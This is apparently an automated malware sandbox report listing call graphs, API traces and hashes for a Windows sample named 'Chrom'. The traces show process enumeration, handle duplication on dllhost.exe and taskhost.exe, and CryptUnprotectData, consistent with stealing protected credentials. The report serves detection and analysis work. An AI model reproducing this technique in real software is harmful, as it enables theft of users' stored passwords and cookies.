434d9e 38491->38495 38493 434e02 38492->38493 38494 434e09 memcpy 38493->38494 38493->38495 38494->38495 38495->38424 38497 417bfe 38496->38497 38498 417be3 38496->38498 38497->38428 38498->38497 38499 41888c 16 API calls 38498->38499 38499->38497 38500->38425 38501->38436 38502->38439 38504 418fb3 38503->38504 38509 418f9b 38503->38509 38505 418fcc 38504->38505 38543 418fd1 11 API calls 38504->38543 38505->38197 38508 418fac 38508->38197 38509->38508 38542 4186b6 11 API calls 38509->38542 38511 417a12 memset 38510->38511 38512 43a08a 38511->38512 38513 43a094 38512->38513 38514 43a144 38512->38514 38516 43a0d3 38512->38516 38515 417bdf 16 API calls 38513->38515 38544 444f9e 38514->38544 38518 43a25c 38515->38518 38519 43a0fa 38516->38519 38520 43a0d8 38516->38520 38518->38203 38541 426e79 124 API calls 38518->38541 38575 417b85 memcpy 38519->38575 38522 41888c 16 API calls 38520->38522 38524 43a0e6 38522->38524 38523 43a107 38527 444f9e 19 API calls 38523->38527 38529 43a119 38523->38529 38525 417bdf 16 API calls 38524->38525 38525->38513 38526 43a176 38532 43a186 38526->38532 38576 431fe3 memset memset memcpy 38526->38576 38527->38529 38529->38526 38570 439f89 38529->38570 38531 43a1cf 38533 43a1f7 38531->38533 38578 426493 124 API calls 38531->38578 38532->38531 38577 417b85 memcpy 38532->38577 38536 43a206 38533->38536 38537 43a21e 38533->38537 38538 41888c 16 API calls 38536->38538 38539 41888c 16 API calls 38537->38539 38538->38513 38539->38513 38540->38203 38541->38205 38542->38508 38543->38509 38550 444fc6 38544->38550 38545 44514d 38559 445167 38545->38559 38591 442e18 memset 38545->38591 38546 445075 38546->38545 38547 44512d 38546->38547 38551 444a07 19 API calls 38546->38551 38552 444a07 19 API calls 38547->38552 38549 4450c9 38588 418555 38549->38588 38550->38546 38550->38549 38554 44506b 38550->38554 38568 445011 38550->38568 38579 444a07 38550->38579 38551->38547 38552->38545 38587 4188fe 11 API calls 38554->38587 38555 4451ae 38560 4451cd 38555->38560 38593 4186b6 11 API calls 38555->38593 38559->38555 38592 417bb8 11 API calls 38559->38592 38562 4451ef 38560->38562 38594 426590 memset memcpy 38560->38594 38566 445214 38562->38566 38595 432148 memset 38562->38595 38596 43d90b memset 38566->38596 38567 445224 38567->38568 38597 432148 memset 38567->38597 38568->38529 38571 43a040 38570->38571 38573 439fa9 38570->38573 38571->38526 38573->38571 38598 42138a 38573->38598 38609 421590 105 API calls 38573->38609 38575->38523 38576->38532 38577->38531 38578->38533 38580 444a11 38579->38580 38581 444aa3 38580->38581 38583 4188fe 11 API calls 38580->38583 38584 442f0e 19 API calls 38580->38584 38585 444aa1 38580->38585 38586 442d34 memset 38580->38586 38582 442eb8 12 API calls 38581->38582 38582->38585 38583->38580 38584->38580 38585->38550 38586->38580 38587->38546 38589 4184f6 11 API calls 38588->38589 38590 418563 38589->38590 38590->38546 38591->38545 38592->38555 38593->38560 38594->38562 38595->38566 38596->38567 38597->38567 38599 4214a5 38598->38599 38605 4213a7 38598->38605 38600 4213be 38599->38600 38601 41e58c memset memset 38599->38601 38600->38573 38601->38600 38602 4210fd 105 API calls 38602->38605 38603 4212f0 87 API calls 38603->38605 38604 41dfc6 memcmp 38604->38605 38605->38600 38605->38602 38605->38603 38605->38604 38606 421309 91 API calls 38605->38606 38607 421463 38605->38607 38606->38605 38607->38599 38607->38600 38608 41e1ec 87 API calls 38607->38608 38608->38599 38609->38573 38610->38211 38611->38210 38612->38216 38613->38222 38614->38223 38615->38210 38617 426e72 38616->38617 38618 426e5f 38616->38618 38637 426e3d 11 API calls 38617->38637 38636 4186b6 11 API calls 38618->38636 38621 426e77 38621->38241 38622 426e6b 38622->38241 38623->38248 38625 427060 38624->38625 38626 42705b 38624->38626 38628 427068 38625->38628 38638 4275eb 38625->38638 38670 426ec7 125 API calls 38626->38670 38628->38253 38630 4270c1 38631 417bdf 16 API calls 38630->38631 38631->38628 38632->38253 38633->38253 38634->38255 38635->38246 38636->38622 38637->38621 38649 427641 38638->38649 38666 427912 38638->38666 38640 42bb13 38687 417bb8 11 API calls 38640->38687 38644 42802d 38682 4261a6 121 API calls 38644->38682 38645 42792a 38681 4186b6 11 API calls 38645->38681 38647 424a43 memset memcpy memcpy 38647->38649 38648 42b99d 38654 42b9b6 38648->38654 38655 42b9eb 38648->38655 38649->38640 38649->38645 38649->38647 38649->38648 38657 427ff1 38649->38657 38649->38666 38669 427988 38649->38669 38671 424748 memset memcpy 38649->38671 38672 424adc 15 API calls 38649->38672 38673 424ab5 memset memcpy memcpy 38649->38673 38674 424598 13 API calls 38649->38674 38676 426151 11 API calls 38649->38676 38677 42608f 91 API calls 38649->38677 38653 427a26 38653->38630 38683 417bb8 11 API calls 38654->38683 38665 42b9e6 38655->38665 38685 4186b6 11 API calls 38655->38685 38680 417bb8 11 API calls 38657->38680 38662 42b9ca 38684 4186b6 11 API calls 38662->38684 38686 4261a6 121 API calls 38665->38686 38666->38653 38675 417bb8 11 API calls 38666->38675 38669->38666 38678 424598 13 API calls 38669->38678 38679 424638 12 API calls 38669->38679 38670->38625 38671->38649 38672->38649 38673->38649 38674->38649 38675->38645 38676->38649 38677->38649 38678->38669 38679->38669 38680->38645 38681->38644 38682->38653 38683->38662 38684->38665 38685->38665 38686->38653 38687->38645 38688->37640 38689->37648 38696 44e188 38697 44e1a6 38696->38697 38698 44e198 FreeLibrary 38696->38698 38698->38697

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 0040BAE3 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 351 40bae3-40bb49 memset call 40a189 CreateFileW 354 40bb4f-40bb67 call 40b5f5 call 413a57 351->354 359 40bb69-40bb78 NtQuerySystemInformation 354->359 360 40bb7a 354->360 361 40bb7e-40bb85 359->361 360->361 362 40bb87-40bb97 361->362 363 40bb99-40bbb0 CloseHandle GetCurrentProcessId 361->363 362->354 362->363 364 40bbb2-40bbb6 363->364 365 40bbd8-40bbec call 415747 call 415799 363->365 364->365 366 40bbb8 364->366 375 40bbf2-40bc19 call 40c40b call 40a211 _wcsicmp 365->375 376 40bd6a-40bd79 call 415776 365->376 368 40bbbb-40bbc1 366->368 370 40bbd2-40bbd6 368->370 371 40bbc3-40bbca 368->371 370->365 370->368 371->370 373 40bbcc-40bbcf 371->373 373->370 383 40bc45-40bc55 OpenProcess 375->383 384 40bc1b-40bc2c _wcsicmp 375->384 386 40bd56-40bd59 383->386 387 40bc5b-40bc60 383->387 384->383 385 40bc2e-40bc3f _wcsicmp 384->385 385->383 388 40bd5b-40bd64 385->388 386->376 386->388 389 40bc66 387->389 390 40bd4d-40bd50 CloseHandle 387->390 388->375 388->376 391 40bc69-40bc6e 389->391 390->386 392 40bc74-40bc7b 391->392 393 40bd1b-40bd29 391->393 392->393 395 40bc81-40bca8 GetCurrentProcess DuplicateHandle 392->395 393->391 394 40bd2f-40bd31 393->394 394->390 395->393 396 40bcaa-40bcd4 memset call 413a57 395->396 399 40bcd6-40bce8 396->399 400 40bced-40bd19 CloseHandle call 40a211 * 2 _wcsicmp 396->400 399->400 400->393 405 40bd33-40bd4b 400->405 405->390
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040BB0B
                                                                                                                                                          • Part of subcall function 0040A189: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040E194,00000000,0040E047,?,00000000,00000208,?), ref: 0040A194
                                                                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040BB32
                                                                                                                                                          • Part of subcall function 0040B5F5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040700C), ref: 0040B5FE
                                                                                                                                                          • Part of subcall function 00413A57: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040BB60,?,000000FF,00000000,00000104), ref: 00413A6A
                                                                                                                                                          • Part of subcall function 00413A57: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413A81
                                                                                                                                                          • Part of subcall function 00413A57: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00413A93
                                                                                                                                                          • Part of subcall function 00413A57: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00413AA5
                                                                                                                                                          • Part of subcall function 00413A57: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00413AB7
                                                                                                                                                          • Part of subcall function 00413A57: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00413AC9
                                                                                                                                                          • Part of subcall function 00413A57: GetProcAddress.KERNEL32(NtQueryObject), ref: 00413ADB
                                                                                                                                                          • Part of subcall function 00413A57: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 00413AED
                                                                                                                                                          • Part of subcall function 00413A57: GetProcAddress.KERNEL32(NtResumeProcess), ref: 00413AFF
                                                                                                                                                        • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040BB73
                                                                                                                                                        • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040BB9C
                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040BBA7
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040BC10
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040BC23
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040BC36
                                                                                                                                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040BC4A
                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040BC90
                                                                                                                                                        • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040BC9F
                                                                                                                                                        • memset.MSVCRT ref: 0040BCBD
                                                                                                                                                        • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040BCF0
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040BD10
                                                                                                                                                        • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040BD50
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                        • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                        • API String ID: 708747863-3398334509
                                                                                                                                                        • Opcode ID: 41abfebd1c81519318b0f84339465481cac2966d8304d7996ed66729d33f3768
                                                                                                                                                        • Instruction ID: 29761171d8d6f99e34678da7c42ad3d9b616dea413bdd79b79df07308111e2da
                                                                                                                                                        • Opcode Fuzzy Hash: 41abfebd1c81519318b0f84339465481cac2966d8304d7996ed66729d33f3768
                                                                                                                                                        • Instruction Fuzzy Hash: E2815971900209EFDB10EF95CC85AAEBBB5FF44305F20447AE905B7291D739AE80CB98
                                                                                                                                                        Function 00415799 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 515 415799-4157ed call 408d81 CreateToolhelp32Snapshot memset Process32FirstW 518 41594d-41595e Process32NextW 515->518 519 4157f2-41583a OpenProcess 518->519 520 415964-415971 CloseHandle 518->520 521 415840-415873 memset call 415974 519->521 522 4158fd-415902 519->522 530 415875-415882 521->530 531 4158c6-4158ea call 4153a6 call 4156f1 521->531 522->518 524 415904-41590a 522->524 525 415915-415927 call 409fb3 524->525 526 41590c-415913 free 524->526 528 415928-41592f 525->528 526->528 535 415931 528->535 536 415934-41594b 528->536 533 415884-415891 GetModuleHandleW 530->533 534 4158ae-4158b5 530->534 542 4158ef-4158fb CloseHandle 531->542 533->534 538 415893-4158a9 GetProcAddress 533->538 534->531 539 4158b7-4158c3 534->539 535->536 536->518 538->534 539->531 542->522
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00408D81: free.MSVCRT ref: 00408D88
                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 004157B7
                                                                                                                                                        • memset.MSVCRT ref: 004157CC
                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 004157E8
                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 0041582D
                                                                                                                                                        • memset.MSVCRT ref: 00415854
                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00415889
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 004158A3
                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 004158F5
                                                                                                                                                        • free.MSVCRT ref: 0041590E
                                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00415957
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00415967
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                        • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                        • API String ID: 1344430650-1740548384
                                                                                                                                                        • Opcode ID: 6e73d59367b69d0d0be5dcf68efd57544415f5f941da5b83940bd7f87101e519
                                                                                                                                                        • Instruction ID: 5ea73396ca473a1f837e0a83f3483b5d1fff5a6958d458d66b17e1ba5df2901d
                                                                                                                                                        • Opcode Fuzzy Hash: 6e73d59367b69d0d0be5dcf68efd57544415f5f941da5b83940bd7f87101e519
                                                                                                                                                        • Instruction Fuzzy Hash: 4B5179B2800218EBDB10EF55CC84ADEB7B9AF95304F1141ABE518E3251D7755E84CF69
                                                                                                                                                        Function 0041A6AF Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0041A5D7: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 0041A603
                                                                                                                                                          • Part of subcall function 0041A5D7: malloc.MSVCRT ref: 0041A60E
                                                                                                                                                          • Part of subcall function 0041A5D7: free.MSVCRT ref: 0041A61E
                                                                                                                                                          • Part of subcall function 004192F2: GetVersionExW.KERNEL32(?), ref: 00419315
                                                                                                                                                        • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 0041A729
                                                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 0041A751
                                                                                                                                                        • free.MSVCRT ref: 0041A75A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1355100292-0
                                                                                                                                                        • Opcode ID: 2fc49b45259d659c88a61f00e55ea1ae81ff3f089ebddaf00de521a8b5a49264
                                                                                                                                                        • Instruction ID: 68c13852fb7afd5d8e0c76ce401d57be7323acd7ffb7733afae93f72ee07f9cd
                                                                                                                                                        • Opcode Fuzzy Hash: 2fc49b45259d659c88a61f00e55ea1ae81ff3f089ebddaf00de521a8b5a49264
                                                                                                                                                        • Instruction Fuzzy Hash: F1216576802218AEEB12ABA4CD44DEF77BCEF05304F1404A7E551D7181E6788FD587A6
                                                                                                                                                        Function 00407687 Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CryptUnprotectData.CRYPT32(-000000FB,00000000,-000000FB,00000000,00000000,-000000FB,-000000FB), ref: 004076FC
                                                                                                                                                          • Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
                                                                                                                                                          • Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA
                                                                                                                                                        • GetProcAddress.KERNEL32(0045EC00,00000000), ref: 004076B7
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000141,?,-000000FB,?,004016C4,?,00000000,00000000,?), ref: 004076DA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 767404330-0
                                                                                                                                                        • Opcode ID: 832906d8a5cb12c8bb733d11a894d9ba26b44f5734ad55cd07f5800a04fa7da7
                                                                                                                                                        • Instruction ID: d423364176a6c8dd7e4ff5da1a82baf2de462266435030bf45fa2c9e15a2548a
                                                                                                                                                        • Opcode Fuzzy Hash: 832906d8a5cb12c8bb733d11a894d9ba26b44f5734ad55cd07f5800a04fa7da7
                                                                                                                                                        • Instruction Fuzzy Hash: 6C018471504A01DED6215F55CC4581BFAE9EB90750B208C3FF0D6E21A0D775AC40DB29
                                                                                                                                                        Function 0040B477 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,00000000,00414A22,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040B48D
                                                                                                                                                        • FindNextFileW.KERNELBASE(?,?,?,00000000,00414A22,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040B4A9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileFind$FirstNext
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1690352074-0
                                                                                                                                                        • Opcode ID: 25427dac3f5a35f7db7d55267f62273ad0c88017264c5fb9230d8676d76f7256
                                                                                                                                                        • Instruction ID: 0f501c6d627a291db363f91b892f93565970ce46203e449eca58727f5cb945cd
                                                                                                                                                        • Opcode Fuzzy Hash: 25427dac3f5a35f7db7d55267f62273ad0c88017264c5fb9230d8676d76f7256
                                                                                                                                                        • Instruction Fuzzy Hash: F9F06276501A119BC721DB74DC459D773D8DB85320B25063EF56AE33C1EF3CAA098768
                                                                                                                                                        Function 0041A8D8 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0041A8E3
                                                                                                                                                        • GetSystemInfo.KERNELBASE(004735C0,?,00000000,004453C0,?,?,?,?,?,?,?,?), ref: 0041A8EC
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoSystemmemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3558857096-0
                                                                                                                                                        • Opcode ID: a69cf0a51d705e93120e938875cfc719a6a5558cfc76ca9bbae332f7c4943f52
                                                                                                                                                        • Instruction ID: 008e5f0b5c38a1f1cab39b63f665e63cad528b58ea392fd89bbd5874da5d37fe
                                                                                                                                                        • Opcode Fuzzy Hash: a69cf0a51d705e93120e938875cfc719a6a5558cfc76ca9bbae332f7c4943f52
                                                                                                                                                        • Instruction Fuzzy Hash: 95E09271A066206BE3117B726C06BDF26D4AF42349F05043BFD0996243E72C8A85829E
                                                                                                                                                        Function 00413F68 Relevance: 48.1, APIs: 25, Strings: 2, Instructions: 802COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 0 413f68-413f85 call 44ddb0 3 413f87-413fa9 call 40cc16 call 40b8ec call 41607f 0->3 4 413fc6-413fcf 0->4 44 413fbb-413fc1 call 41691e 3->44 45 413fab-413fb9 call 416148 call 4160f3 3->45 5 413fd5-414010 memset call 412d29 wcsrchr 4->5 6 414228 4->6 15 414012 5->15 16 414015-414026 5->16 10 41422d-414236 6->10 13 414283-41428c 10->13 14 414238-41424b call 40aeaf call 4131ce 10->14 18 4142d9-4142e2 13->18 19 41428e-4142a1 call 40aeaf call 41303d 13->19 37 414250-414253 14->37 15->16 21 414028-41402e 16->21 22 41409f-4140b0 call 40aeaf call 41335f 16->22 23 4142e8-414358 memset * 2 call 416b94 call 406cd0 call 40a2de call 40a157 18->23 24 41437c-414385 18->24 49 4142a6-4142a9 19->49 31 414030 21->31 32 414032-414034 21->32 80 4140b2 22->80 81 4140df-4140e2 call 40b7d1 22->81 135 414377 23->135 136 41435a-414372 call 4010a6 23->136 29 41438b-4143fb memset * 2 call 416b94 call 406cd0 call 40a2de call 40a157 24->29 30 41441f-414428 24->30 156 41441a 29->156 157 4143fd-414415 call 4010a6 29->157 39 4144bc-4144c4 30->39 40 41442e-4144a8 memset * 2 call 416b94 call 406cd0 call 40a2de call 40a157 30->40 31->32 32->22 43 414036-41403a 32->43 50 414255 37->50 51 414279-414281 call 40b7d1 37->51 53 4145f3-4145fc 39->53 54 4144ca-41456b memset * 2 call 416b94 call 406cd0 call 40a2de call 406cd0 call 40b43e 39->54 173 4144b7 40->173 174 4144aa-4144b2 call 413db6 40->174 43->22 47 41403c-41406e call 409a0c call 40aeaf call 413eec 43->47 44->4 45->44 151 414070-414090 call 40afdb call 409a0c 47->151 152 414092-41409d call 40b7d1 47->152 62 4142ab 49->62 63 4142cf-4142d7 call 40b7d1 49->63 64 41425b-414274 call 40afdb call 409a0c 50->64 51->13 70 414602-414660 memset * 3 53->70 71 414746-41474f 53->71 199 4145d2-4145df call 40b477 54->199 79 4142b1-4142ca call 40afdb call 409a0c 62->79 63->18 138 414276 64->138 86 414662-41466a 70->86 87 41469e-41473c call 416b94 call 406cd0 call 40a2de call 413db6 call 406cd0 call 40a2de call 413db6 call 406cd0 call 40a2de call 413db6 70->87 84 414755-4147bd memset * 2 call 416b94 call 40a2de call 40a157 71->84 85 4147e6-4147ef 71->85 159 4142cc 79->159 99 4140b8-4140d1 call 40afdb call 409a0c 80->99 116 4140e7-4140f1 81->116 177 4147c6-4147cd 84->177 178 4147bf 84->178 94 4147f5-414805 85->94 95 414a78-414a7c 85->95 86->87 88 41466c-414699 call 409f85 call 413e30 call 413db6 86->88 263 414741 87->263 88->71 110 414852-4148df memset * 3 call 416b94 call 406cd0 call 40a2de call 40a157 94->110 111 414807-41482f call 40a211 call 406cd0 _wcsicmp 94->111 160 4140d6-4140dd 99->160 210 4148e1 110->210 211 4148e8-4148ef 110->211 184 414831-414836 111->184 185 41483b-41484d call 44653e 111->185 131 4140f7-414100 call 415747 call 415799 116->131 132 414226 116->132 176 414105-414124 call 406cd0 call 4159f3 131->176 132->6 135->24 136->135 138->51 151->152 152->116 156->30 157->156 159->63 160->81 160->99 173->39 174->173 212 414217-414224 call 415776 176->212 213 41412a-4141c3 memset * 4 call 40a22f * 3 176->213 188 4147e1 177->188 189 4147cf-4147dd 177->189 178->177 193 414a6b-414a73 call 4010a6 184->193 185->95 188->85 189->188 193->95 215 4145e1-4145f1 call 40b4e4 199->215 216 41456d-41457a call 40b3fa 199->216 210->211 217 4148f1-414923 call 406cd0 call 40a2de call 40a157 211->217 218 414935-414948 call 44653e 211->218 212->10 213->212 256 4141c5-4141f7 call 406cd0 call 40a2de call 40a157 213->256 215->53 216->199 236 41457c-4145cd memset call 406cd0 